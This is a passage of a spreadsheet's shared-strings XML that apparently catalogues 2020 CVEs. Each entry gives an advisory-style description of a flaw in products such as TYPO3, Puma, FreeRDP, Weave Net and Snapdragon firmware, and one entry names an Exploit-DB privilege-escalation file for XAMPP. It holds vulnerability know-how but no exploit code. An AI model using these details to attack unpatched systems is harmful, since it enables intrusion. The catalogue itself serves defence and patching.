    <t>In LoRaMac-node before 4.4.4, a reception buffer overflow can happen due to the received buffer size not being checked. This has been fixed in 4.4.4.</t>
  </si>
  <si>
    <t>CVE-2020-11069</t>
  </si>
  <si>
    <t>In TYPO3 CMS 9.0.0 through 9.5.16 and 10.0.0 through 10.4.1, it has been discovered that the backend user interface and install tool are vulnerable to a same-site request forgery. A backend user can be tricked into interacting with a malicious resource an attacker previously managed to upload to the web server. Scripts are then executed with the privileges of the victims' user session. In a worst-case scenario, new admin users can be created which can directly be used by an attacker. The vulnerability is basically a cross-site request forgery (CSRF) triggered by a cross-site scripting vulnerability (XSS) - but happens on the same target host - thus, it's actually a same-site request forgery. Malicious payload such as HTML containing JavaScript might be provided by either an authenticated backend user or by a non-authenticated user using a third party extension, e.g. file upload in a contact form with knowing the target location. To be successful, the attacked victim requires an active and valid backend or install tool user session at the time of the attack. This has been fixed in 9.5.17 and 10.4.2. The deployment of additional mitigation techniques is suggested as described below. - Sudo Mode Extension This TYPO3 extension intercepts modifications to security relevant database tables, e.g. those storing user accounts or storages of the file abstraction layer. Modifications need to confirmed again by the acting user providing their password again. This technique is known as sudo mode. This way, unintended actions happening in the background can be mitigated. - https://github.com/FriendsOfTYPO3/sudo-mode - https://extensions.typo3.org/extension/sudo_mode - Content Security Policy Content Security Policies tell (modern) browsers how resources served a particular site are handled. It is also possible to disallow script executions for specific locations. In a TYPO3 context, it is suggested to disallow direct script execution at least for locations /fileadmin/ and /uploads/.</t>
  </si>
  <si>
    <t>CVE-2020-1107</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-1104, CVE-2020-1105.</t>
  </si>
  <si>
    <t>CVE-2020-11070</t>
  </si>
  <si>
    <t>The SVG Sanitizer extension for TYPO3 has a cross-site scripting vulnerability in versions before 1.0.3. Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Albeit the markup is not valid it still is evaluated in browsers and leads to cross-site scripting. This is fixed in version 1.0.3.</t>
  </si>
  <si>
    <t>CVE-2020-11071</t>
  </si>
  <si>
    <t>SLPJS (npm package slpjs) before version 0.27.2, has a vulnerability where users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This is fixed in version 0.27.2.</t>
  </si>
  <si>
    <t>CVE-2020-11072</t>
  </si>
  <si>
    <t>In SLP Validate (npm package slp-validate) before version 1.2.1, users could experience false-negative validation outcomes for MINT transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton. This has been fixed in slp-validate in version 1.2.1. Additonally, slpjs version 0.27.2 has a related fix under related CVE-2020-11071.</t>
  </si>
  <si>
    <t>CVE-2020-11073</t>
  </si>
  <si>
    <t>In Autoswitch Python Virtualenv before version 0.16.0, a user who enters a directory with a malicious `.venv` file could run arbitrary code without any user interaction. This is fixed in version: 1.16.0</t>
  </si>
  <si>
    <t>CVE-2020-11074</t>
  </si>
  <si>
    <t>In PrestaShop from version 1.5.3.0 and before version 1.7.6.6, there is a stored XSS when using the name of a quick access item. The problem is fixed in 1.7.6.6.</t>
  </si>
  <si>
    <t>CVE-2020-11075</t>
  </si>
  <si>
    <t>In Anchore Engine version 0.7.0, a specially crafted container image manifest, fetched from a registry, can be used to trigger a shell escape flaw in the anchore engine analyzer service during an image analysis process. The image analysis operation can only be executed by an authenticated user via a valid API request to anchore engine, or if an already added image that anchore is monitoring has its manifest altered to exploit the same flaw. A successful attack can be used to execute commands that run in the analyzer environment, with the same permissions as the user that anchore engine is run as - including access to the credentials that Engine uses to access its own database which have read-write ability, as well as access to the running engien analyzer service environment. By default Anchore Engine is released and deployed as a container where the user is non-root, but if users run Engine directly or explicitly set the user to 'root' then that level of access may be gained in the execution environment where Engine runs. This issue is fixed in version 0.7.1.</t>
  </si>
  <si>
    <t>CVE-2020-11076</t>
  </si>
  <si>
    <t>In Puma (RubyGem) before 4.3.4 and 3.12.5, an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.</t>
  </si>
  <si>
    <t>CVE-2020-11077</t>
  </si>
  <si>
    <t>In Puma (RubyGem) before 4.3.5 and 3.12.6, a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the proxy does not expect. If the proxy has reused the persistent connection to Puma to send another request for a different client, the second response from the first client will be sent to the second client. This is a similar but different vulnerability from CVE-2020-11076. The problem has been fixed in Puma 3.12.6 and Puma 4.3.5.</t>
  </si>
  <si>
    <t>CVE-2020-11078</t>
  </si>
  <si>
    <t>In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.</t>
  </si>
  <si>
    <t>CVE-2020-11079</t>
  </si>
  <si>
    <t>node-dns-sync (npm module dns-sync) through 0.2.0 allows execution of arbitrary commands . This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This has been fixed in 0.2.1.</t>
  </si>
  <si>
    <t>CVE-2020-1108</t>
  </si>
  <si>
    <t>A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests, aka '.NET Core &amp; .NET Framework Denial of Service Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11080</t>
  </si>
  <si>
    <t>In nghttp2 before version 1.41.0, the overly large HTTP/2 SETTINGS frame payload causes denial of service. The proof of concept attack involves a malicious client constructing a SETTINGS frame with a length of 14,400 bytes (2400 individual settings entries) over and over again. The attack causes the CPU to spike at 100%. nghttp2 v1.41.0 fixes this vulnerability. There is a workaround to this vulnerability. Implement nghttp2_on_frame_recv_callback callback, and if received frame is SETTINGS frame and the number of settings entries are large (e.g., &gt; 32), then drop the connection.</t>
  </si>
  <si>
    <t>CVE-2020-11081</t>
  </si>
  <si>
    <t>osquery before version 4.4.0 enables a privilege escalation vulnerability. If a Window system is configured with a PATH that contains a user-writable directory then a local user may write a zlib1.dll DLL, which osquery will attempt to load. Since osquery runs with elevated privileges this enables local escalation. This is fixed in version 4.4.0.</t>
  </si>
  <si>
    <t>114</t>
  </si>
  <si>
    <t>CVE-2020-11082</t>
  </si>
  <si>
    <t>In Kaminari before 1.2.1, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links. This has been fixed in 1.2.1.</t>
  </si>
  <si>
    <t>CVE-2020-11083</t>
  </si>
  <si>
    <t>In October from version 1.0.319 and before version 1.0.466, a user with access to a markdown FormWidget that stores data persistently could create a stored XSS attack against themselves and any other users with access to the generated HTML from the field. This has been fixed in 1.0.466. For users of the RainLab.Blog plugin, this has also been fixed in 1.4.1.</t>
  </si>
  <si>
    <t>CVE-2020-11084</t>
  </si>
  <si>
    <t>In iPear, the manual execution of the eval() function can lead to command injection. Only PCs where commands are manually executed via "For Developers" are affected. This function allows executing any PHP code within iPear which may change, damage, or steal data (files) from the PC.</t>
  </si>
  <si>
    <t>CVE-2020-11085</t>
  </si>
  <si>
    <t>In FreeRDP before 2.1.0, there is an out-of-bounds read in cliprdr_read_format_list. Clipboard format data read (by client or server) might read data out-of-bounds. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:L</t>
  </si>
  <si>
    <t>CVE-2020-11086</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, there is an out-of-bound read in ntlm_read_ntlm_v2_client_challenge that reads up to 28 bytes out-of-bound to an internal structure. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11087</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, there is an out-of-bound read in ntlm_read_AuthenticateMessage. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11088</t>
  </si>
  <si>
    <t>In FreeRDP less than or equal to 2.0.0, there is an out-of-bound read in ntlm_read_NegotiateMessage. This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-11089</t>
  </si>
  <si>
    <t>In FreeRDP before 2.1.0, there is an out-of-bound read in irp functions (parallel_process_irp_create, serial_process_irp_create, drive_process_irp_write, printer_process_irp_write, rdpei_recv_pdu, serial_process_irp_write). This has been fixed in 2.1.0.</t>
  </si>
  <si>
    <t>CVE-2020-1109</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1110.</t>
  </si>
  <si>
    <t>CVE-2020-11090</t>
  </si>
  <si>
    <t>In Indy Node 1.12.2, there is an Uncontrolled Resource Consumption vulnerability. Indy Node has a bug in TAA handling code. The current primary can be crashed with a malformed transaction from a client, which leads to a view change. Repeated rapid view changes have the potential of bringing down the network. This is fixed in version 1.12.3.</t>
  </si>
  <si>
    <t>CVE-2020-11091</t>
  </si>
  <si>
    <t>In Weave Net before version 2.6.3, an attacker able to run a process as root in a container is able to respond to DNS requests from the host and thereby insert themselves as a fake service. In a cluster with an IPv4 internal network, if IPv6 is not totally disabled on the host (via ipv6.disable=1 on the kernel cmdline), it will be either unconfigured or configured on some interfaces, but it's pretty likely that ipv6 forwarding is disabled, ie /proc/sys/net/ipv6/conf//forwarding == 0. Also by default, /proc/sys/net/ipv6/conf//accept_ra == 1. The combination of these 2 sysctls means that the host accepts router advertisements and configure the IPv6 stack using them. By sending rogue router advertisements, an attacker can reconfigure the host to redirect part or all of the IPv6 traffic of the host to the attacker controlled container. Even if there was no IPv6 traffic before, if the DNS returns A (IPv4) and AAAA (IPv6) records, many HTTP libraries will try to connect via IPv6 first then fallback to IPv4, giving an opportunity to the attacker to respond. If by chance you also have on the host a vulnerability like last year's RCE in apt (CVE-2019-3462), you can now escalate to the host. Weave Net version 2.6.3 disables the accept_ra option on the veth devices that it creates.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:H/A:N</t>
  </si>
  <si>
    <t>350</t>
  </si>
  <si>
    <t>CVE-2020-11093</t>
  </si>
  <si>
    <t>Hyperledger Indy Node is the server portion of a distributed ledger purpose-built for decentralized identity. In Hyperledger Indy before version 1.12.4, there is lack of signature verification on a specific transaction which enables an attacker to make certain unauthorized alterations to the ledger. Updating a DID with a nym transaction will be written to the ledger if neither ROLE or VERKEY are being changed, regardless of sender. A malicious DID with no particular role can ask an update for another DID (but cannot modify its verkey or role). This is bad because 1) Any DID can write a nym transaction to the ledger (i.e., any DID can spam the ledger with nym transactions), 2) Any DID can change any other DID's alias, 3) The update transaction modifies the ledger metadata associated with a DID.</t>
  </si>
  <si>
    <t>CVE-2020-11094</t>
  </si>
  <si>
    <t>The October CMS debugbar plugin before version 3.1.0 contains a feature where it will log all requests (and all information pertaining to each request including session data) whenever it is enabled. This presents a problem if the plugin is ever enabled on a system that is open to untrusted users as the potential exists for them to use this feature to view all requests being made to the application and obtain sensitive information from those requests. There even exists the potential for account takeovers of authenticated users by non-authenticated public users, which would then lead to a number of other potential issues as an attacker could theoretically get full access to the system if the required conditions existed. Issue has been patched in v3.1.0 by locking down access to the debugbar to all users; it now requires an authenticated backend user with a specifically enabled permission before it is even usable, and the feature that allows access to stored request information is restricted behind a different permission that's more restrictive.</t>
  </si>
  <si>
    <t>CVE-2020-11095</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, an out of bound reads occurs resulting in accessing a memory location that is outside of the boundaries of the static array PRIMARY_DRAWING_ORDER_FIELD_BYTES. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-11096</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is a global OOB read in update_read_cache_bitmap_v3_order. As a workaround, one can disable bitmap cache with -bitmap-cache (default). This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-11097</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, an out of bounds read occurs resulting in accessing a memory location that is outside of the boundaries of the static array PRIMARY_DRAWING_ORDER_FIELD_BYTES. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-11098</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is an out-of-bound read in glyph_cache_put. This affects all FreeRDP clients with `+glyph-cache` option enabled This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-11099</t>
  </si>
  <si>
    <t>In FreeRDP before version 2.1.2, there is an out of bounds read in license_read_new_or_upgrade_license_packet. A manipulated license packet can lead to out of bound reads to an internal buffer. This is fixed in version 2.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-1110</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Update Stack fails to properly handle objects in memory, aka 'Windows Update Stack Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1109.</t>
  </si>
  <si>
    <t>exploits/windows/local/50337.ps1</t>
  </si>
  <si>
    <t>XAMPP 7.4.3 - Local Privilege Escalation</t>
  </si>
  <si>
    <t>2021-09-27</t>
  </si>
  <si>
    <t>CVE-2020-11100</t>
  </si>
  <si>
    <t>In hpack_dht_insert in hpack-tbl.c in the HPACK decoder in HAProxy 1.8 through 2.x before 2.1.4, a remote attacker can write arbitrary bytes around a certain location on the heap via a crafted HTTP/2 request, possibly causing remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11102</t>
  </si>
  <si>
    <t>hw/net/tulip.c in QEMU 4.2.0 has a buffer overflow during the copying of tx/rx buffers because the frame size is not validated against the r/w data length.</t>
  </si>
  <si>
    <t>CVE-2020-11103</t>
  </si>
  <si>
    <t>JsLink in Webswing before 2.6.12 LTS, and 2.7.x and 20.x before 20.1, allows remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-11104</t>
  </si>
  <si>
    <t>An issue was discovered in USC iLab cereal through 1.3.0. Serialization of an (initialized) C/C++ long double variable into a BinaryArchive or PortableBinaryArchive leaks several bytes of stack or heap memory, from which sensitive information (such as memory layout or private keys) can be gleaned if the archive is distributed outside of a trusted context.</t>
  </si>
  <si>
    <t>CVE-2020-11105</t>
  </si>
  <si>
    <t>An issue was discovered in USC iLab cereal through 1.3.0. It employs caching of std::shared_ptr values, using the raw pointer address as a unique identifier. This becomes problematic if an std::shared_ptr variable goes out of scope and is freed, and a new std::shared_ptr is allocated at the same address. Serialization fidelity thereby becomes dependent upon memory layout. In short, serialized std::shared_ptr variables cannot always be expected to serialize back into their original values. This can have any number of consequences, depending on the context within which this manifests.</t>
  </si>
  <si>
    <t>CVE-2020-11106</t>
  </si>
  <si>
    <t>An issue was discovered in Responsive Filemanager through 9.14.0. In the dialog.php page, the session variable $_SESSION['RF']["view_type"] wasn't sanitized if it was already set. This made stored XSS possible if one opens ajax_calls.php and uses the "view" action and places a payload in the type parameter, and then returns to the dialog.php page. This occurs because ajax_calls.php was also able to set the $_SESSION['RF']["view_type"] variable, but there it wasn't sanitized.</t>
  </si>
  <si>
    <t>CVE-2020-11107</t>
  </si>
  <si>
    <t>An issue was discovered in XAMPP before 7.2.29, 7.3.x before 7.3.16 , and 7.4.x before 7.4.4 on Windows. An unprivileged user can change a .exe configuration in xampp-contol.ini for all users (including admins) to enable arbitrary command execution.</t>
  </si>
  <si>
    <t>CVE-2020-11108</t>
  </si>
  <si>
    <t>The Gravity updater in Pi-hole through 4.4 allows an authenticated adversary to upload arbitrary files. This can be abused for Remote Code Execution by writing to a PHP file in the web directory. (Also, it can be used in conjunction with the sudo rule for the www-data user to escalate privileges to root.) The code error is in gravity_DownloadBlocklistFromUrl in gravity.sh.</t>
  </si>
  <si>
    <t>CVE-2020-1111</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Windows improperly handles calls to Clipboard Service, aka 'Windows Clipboard Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1121, CVE-2020-1165, CVE-2020-1166.</t>
  </si>
  <si>
    <t>CVE-2020-11110</t>
  </si>
  <si>
    <t>Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.</t>
  </si>
  <si>
    <t>CVE-2020-11111</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.activemq.* (aka activemq-jms, activemq-core, activemq-pool, and activemq-pool-jms).</t>
  </si>
  <si>
    <t>CVE-2020-11112</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy).</t>
  </si>
  <si>
    <t>CVE-2020-11113</t>
  </si>
  <si>
    <t>FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).</t>
  </si>
  <si>
    <t>CVE-2020-11114</t>
  </si>
  <si>
    <t>u'Bluetooth devices does not properly restrict the L2CAP payload length allowing users in radio range to cause a buffer overflow via a crafted Link Layer packet(Equivalent to CVE-2019-17060,CVE-2019-17061 and CVE-2019-17517 in Sweyntooth paper)' in Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music in AR9344</t>
  </si>
  <si>
    <t>CVE-2020-11115</t>
  </si>
  <si>
    <t>u'Buffer over read occurs while processing information element from beacon due to lack of check of data received from beacon' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, MSM8998, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS405, QCS605, QM215, Rennell, SA415M, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM660, SDM845, SDX20, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11116</t>
  </si>
  <si>
    <t>u'Possible out of bound write while processing association response received from host due to lack of check of IE length' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996AU, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS405, QCS605, QCS610, QM215, SA6155P, Saipan, SC8180X, SDA845, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM845, SDX20, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11117</t>
  </si>
  <si>
    <t>u'In the lbd service, an external user can issue a specially crafted debug command to overwrite arbitrary files with arbitrary content resulting in remote code execution.' in Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Wired Infrastructure and Networking in IPQ4019, IPQ6018, IPQ8064, IPQ8074, QCA4531, QCA9531, QCA9980</t>
  </si>
  <si>
    <t>CVE-2020-11118</t>
  </si>
  <si>
    <t>u'Information exposure issues while processing IE header due to improper check of beacon IE frame' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8017, APQ8053, APQ8096AU, APQ8098, Bitra, Kamorta, MDM9150, MDM9206, MDM9207C, MDM9607, MDM9640, MDM9650, MSM8905, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8998, Nicobar, QCA6174A, QCA6574AU, QCA9377, QCA9379, QCM2150, QCN7605, QCS405, QCS605, QCS610, QM215, Rennell, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM630, SDM632, SDM636, SDM660, SDM670, SDM710, SDM845, SDX20, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11119</t>
  </si>
  <si>
    <t>Buffer over-read can happen when the buffer length received from response handlers is more than the size of the payload in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-1112</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11120</t>
  </si>
  <si>
    <t>u'Calling thread may free the data buffer pointer that was passed to the callback and later when event loop executes the callback, data buffer may not be valid and will lead to use after free scenario' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8096AU, APQ8098, Bitra, Kamorta, MSM8917, MSM8953, MSM8998, QCM2150, QCS405, QCS605, QM215, Rennell, Saipan, SDM429, SDM439, SDM450, SDM632, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11121</t>
  </si>
  <si>
    <t>u'Possible buffer overflow in WIFI hal process due to usage of memcpy without checking length of destination buffer' in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SC8180X, SC8180XP, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11122</t>
  </si>
  <si>
    <t>u'Null Pointer exception while playing crafted mkv file as data stream get deleted on secondary invalid configuration' in Snapdragon Auto, Snapdragon Consumer IOT, Snapdragon Mobile in APQ8098, Bitra, Kamorta, SA6155P, Saipan, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11123</t>
  </si>
  <si>
    <t>u'information disclosure in gatekeeper trustzone implementation as the throttling mechanism to prevent brute force attempts at getting user`s lock-screen password can be bypassed by performing the standard gatekeeper operations.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in APQ8009, APQ8009W, APQ8017, APQ8037, APQ8053, APQ8064AU, APQ8096, APQ8096AU, APQ8096SG, APQ8098, MDM8207, MDM9150, MDM9205, MDM9206, MDM9207, MDM9250, MDM9607, MDM9628, MDM9640, MDM9650, MDM9655, MSM8108, MSM8208, MSM8209, MSM8608, MSM8905, MSM8909, MSM8909W, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8996, MSM8996AU, MSM8996SG, MSM8998, QCM4290, QCS405, QCS410, QCS4290, QCS603, QCS605, QCS610, QM215, QSM8250, QSM8350, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180XP, SDA429W, SDA640, SDA660, SDA670, SDA845, SDA855, SDM1000, SDM429, SDM429W, SDM439, SDM450, SDM455, SDM630, SDM632, SDM636, SDM640, SDM660, SDM670, SDM710, SDM712, SDM830, SDM845, SDM850, SDW2500, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR1120, SXR1130, SXR2130, SXR2130P, WCD9330</t>
  </si>
  <si>
    <t>CVE-2020-11124</t>
  </si>
  <si>
    <t>u'Possible use-after-free while accessing diag client map table since list can be reallocated due to exceeding max client limit.' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music in MDM9607, Nicobar, QCS404, QCS405, QCS610, Rennell, SA6155P, SA8155P, Saipan, SC8180X, SDM660, SDX55, SM6150, SM7150, SM8150, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11125</t>
  </si>
  <si>
    <t>u'Out of bound access can happen in MHI command process due to lack of check of channel id value received from MHI devices' in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking in Agatti, APQ8009, Bitra, IPQ4019, IPQ5018, IPQ6018, IPQ8064, IPQ8074, Kamorta, MDM9150, MDM9607, MDM9650, MSM8905, MSM8917, MSM8953, Nicobar, QCA6390, QCA9531, QCM2150, QCS404, QCS405, QCS605, QCS610, QM215, QRB5165, Rennell, SA415M, SA515M, SA6155P, SA8155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM660, SDM670, SDM710, SDM845, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11126</t>
  </si>
  <si>
    <t>Possible out of bound read while WLAN frame parsing due to lack of check for body and header length in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking</t>
  </si>
  <si>
    <t>CVE-2020-11127</t>
  </si>
  <si>
    <t>u'Integer overflow can cause a buffer overflow due to lack of table length check in the extensible boot Loader during the validation of security metadata while processing objects to be loaded' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wired Infrastructure and Networking in MDM9205, QCM4290, QCS405, QCS410, QCS4290, QCS610, QSM8250, SA415M, SA515M, SA6145P, SA6150P, SA6155, SA6155P, SA8150P, SA8155, SA8155P, SA8195P, SC7180, SC8180X, SC8180X+SDX55, SC8180XP, SDA640, SDA845, SDA855, SDM1000, SDM640, SDM830, SDM845, SDM850, SDX24, SDX50M, SDX55, SDX55M, SM4125, SM4250, SM4250P, SM6115, SM6115P, SM6150, SM6150P, SM6250, SM6250P, SM6350, SM7125, SM7150, SM7150P, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11128</t>
  </si>
  <si>
    <t>u'Possible out of bound access while copying the mask file content into the buffer without checking the buffer size' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice &amp; Music, Snapdragon Wearables in APQ8009, APQ8096AU, APQ8098, Bitra, Kamorta, MDM9150, MDM9607, MDM9650, MSM8917, MSM8920, MSM8937, MSM8940, MSM8953, MSM8998, QCM2150, QCS405, QCS605, QCS610, QM215, Rennell, SA515M, SA6155P, Saipan, SC8180X, SDM429, SDM429W, SDM439, SDM450, SDM632, SDM660, SDM670, SDM710, SDM845, SDX24, SDX55, SM6150, SM7150, SM8150, SM8250, SXR1130, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-11129</t>
  </si>
  <si>
    <t>u'During the error occurrence in capture request, the buffer is freed and later accessed causing the camera APP to fail due to memory use-after-free' in Snapdragon Consumer IOT, Snapdragon Mobile in Bitra, Kamorta, QCS605, Saipan, SDM710, SM8250, SXR2130</t>
  </si>
  <si>
    <t>CVE-2020-1113</t>
  </si>
  <si>
    <t>A security feature bypass vulnerability exists in Microsoft Windows when the Task Scheduler service fails to properly verify client connections over RPC, aka 'Windows Task Scheduler Security Feature Bypass Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11130</t>
  </si>
  <si>
    <t>u'Possible buffer overflow in WIFI hal process due to copying data without checking the buffer length' in Snapdragon Auto, Snapdragon Compute, Snapdragon Industrial IOT, Snapdragon Mobile in QCM4290, QCS4290, QM215, QSM8350, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SC8180X, SC8180XP, SDX55, SDX55M, SM4250, SM4250P, SM6115, SM6115P, SM6125, SM6250, SM6350, SM7125, SM7225, SM7250, SM7250P, SM8150, SM8150P, SM8250, SM8350, SM8350P, SXR2130, SXR2130P</t>
  </si>
  <si>
    <t>CVE-2020-11131</t>
  </si>
